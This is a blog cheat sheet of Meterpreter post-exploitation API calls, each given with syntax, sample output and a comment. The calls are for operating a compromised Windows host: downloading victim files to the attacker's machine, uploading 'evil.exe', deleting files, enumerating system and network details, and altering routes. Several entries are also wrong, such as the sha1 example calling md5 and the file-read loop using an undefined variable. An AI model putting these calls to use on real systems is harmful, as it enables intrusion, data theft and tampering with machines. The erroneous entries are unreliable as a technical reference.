This page contains meterpreter methods with their syntax and output. The aim was to provide a quick reference for the meterpreter script developer.
Rather than checking the code of already existing meterpreter scripts and searching for the relevant method, this page can be like a one stop shop.
Hope this will help newbies and enthusiast like me who want to start writing their own meterpreter scripts.
P.S : Not all the methods are covered as this is all i can do in 3 hours. More to update soon :)
Get all the files/folders in a directory
Syntax: client.fs.dir.entries
Output: ["AUTOEXEC.BAT", "boot.ini", "CONFIG.SYS", "Documents and Settings"]
Comment: By default it will get the files and directories of present working directory.
Syntax: client.fs.dir.entries("c:\\")
Output: ["sample_file.txt","dummy_directory","myfile.exe"]
Comment: This will get the files and directories of c drive.
Get all the files/folders in a directory along with extra information
Syntax: client.fs.dir.entries_with_info
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: By default it will get the files and directories of present working directory.
Syntax: client.fs.dir.entries_with_info("c:\\")
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: This will get the files and directories of c drive.
Change the directory
Syntax: client.fs.dir.chdir("c:\\")
Output: 0
Comment: This will change the present working directory to c drive.
Make directory
Syntax: client.fs.dir.mkdir("c:\\oldman")
Output: 0
Comment: This will make a directory named "oldman" in c drive.
Get current working directory
Syntax: client.fs.dir.pwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name
Syntax: client.fs.dir.getwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name
Delete a directory
Syntax: client.fs.dir.delete("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Syntax: client.fs.dir.rmdir("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Syntax: client.fs.dir.unlink("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Download contents of a target directory
Syntax: client.fs.dir.download("/root/oldmanlab/","c:\\oldman")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will download all the file inside oldman directory of victim and will save inside the oldmanlab directory of an attacker system.
Upload contents of a local directory to victim system
Syntax: client.fs.dir.upload("c:\\oldman","/root/oldmanlab")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will upload all the content inside oldmanlab directory of an attacker to the oldman directory of victim system.
Get the file separator
Syntax: client.fs.file.separator
Output: \\
Comment: This will give the file separator used by the system (\\ for windows, \ for unix.
Search for the specified file
Syntax: client.fs.file.search("c:\\oldman","hacking.txt")
Output: [{"path"=>"c:\\oldman\\lab", "name"=>"hacking.txt", "size"=>4}]
Comment: This will search for hacking.txt in the oldman directory and its subdirectories
Get the basename for the specified file
Syntax: client.fs.file.basename("c:\\oldman\\hacking.txt")
Output: hacking.txt
Comment: This will give the filename of the filepath specified.
Expand path of the directory
Syntax: client.fs.file.expand_path("%TEMP%")
Output: "C:\\WINDOWS\\TEMP"
Comment: This will give the absolute path of the shortcut specified
Get the md5 of file
Syntax: client.fs.file.md5("c:\\oldman\\file.txt")
Output: "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'"
Comment: This will give the md5 sum of the specified file
Get the sha1 of file
Syntax: client.fs.file.md5("c:\\oldman\\file.txt")
Output: "Q\xD0\b\xFF\xFA\xD8\xF4x7_\xAE\x911\xB4\xE12V\xB8\tw"
Comment: This will give the sha1 of the specified file
Check if specified file exists
Syntax: client.fs.file.exists?("c:\\oldman\\file.txt")
Output: true
Comment: This will return true if file exists else false
Delete specified file
Syntax: client.fs.file.rm("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will return true if file exists else false
Syntax: client.fs.file.unlink("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will return true if file exists else false
Upload file to victims system
Syntax: client.fs.file.upload("c:\\oldman","/root/lab/evil.exe")
Output: ["/root/lab/firefox.lnk"]
Comment: This will upload evil.exe from attackers system to victims oldman directory
Download file from victims system
Syntax: client.fs.file.download("/root/lab/secret.exe","c:\\oldman\\secret.exe")
Output: ["c:\\oldman\\secret.exe"]
Comment: This will download secret.exe from victims system and will save it to attackers root directory
Open a file in read mode and copy the content to some variable
Syntax: file1 = client.fs.file.new("c:\\oldman\\my_file.txt")
temp = ""
until file1.eof?
temp << file_object.read
Output: N.A
Comment: This will copy all the data inside my_file.txt and store it in temp variable
List all the available interface from victims system
Syntax: client.net.config.get_interfaces
Output: [......]
Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc
Syntax: client.net.config.get_interfaces[0]
Output: [......]
Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc
Get the IP address of specified interface
Syntax: client.net.config.get_interfaces[1].ip
Output: 192.168.7.3
Comment: This will give IP address of the second interface in the list.
List all the routes available in victims system
Syntax: client.net.config.get_routes
Output:
Comment: This will return an array of all the routes available in the victims system along with the details like subnet, netmask, gateway
Syntax: client.net.config.get_routes[0]
Output:
Comment: This will return an array of the first route available in the victims system along with the details like subnet, netmask, gateway
Add a route in victims system
Syntax: client.net.config.add_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will add route in the victims system. The first parameter is subnet, second is netmask and third is gateway.
Remove specified route from victims system
Syntax: client.net.config.remove_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will remove route from the victims system. The first parameter is subnet, second is netmask and third is gateway.
Get the user id
Syntax: client.sys.config.getuid
Output: "NT AUTHORITY\\SYSTEM"
Comment: This will give the user id of the victim system. It basically shows our access level.
Get the victims computer name
Syntax: client.sys.config.sysinfo["Computer"]
Output: "WINXP-1337"
Comment: This will give the computer name of the compromised system.
Get the victims operating system name and version
Syntax: client.sys.config.sysinfo["OS"]
Output: "Windows XP (Build 2600, Service Pack 2)."
Comment: This will give the operating system name running on the compromised system.
Get the victims operating system architecture
Syntax: client.sys.config.sysinfo["Architecture"]
Output: "x86"
Comment: This will give the architecture (x86,64-bit)of the operating system running on compromised system.
Get the victims operating system language
Syntax: client.sys.config.sysinfo["System Language"]
Output: "en_US"
Comment: This will give operating system language of the compromised system.
Revert to previous user privileges
Syntax: client.sys.config.revert_to_self
Output: N.A
Comment: Let say if we had change privilege from "NT AUTHORITY\\oldmanlab" to "NT AUTHORITY\\SYSTEM" then revert to self will again change our privileges to "NT AUTHORITY\\oldmanlab"
출처 - http://oldmanlab.blogspot.kr/p/meterpreter-api-cheat-sheet.html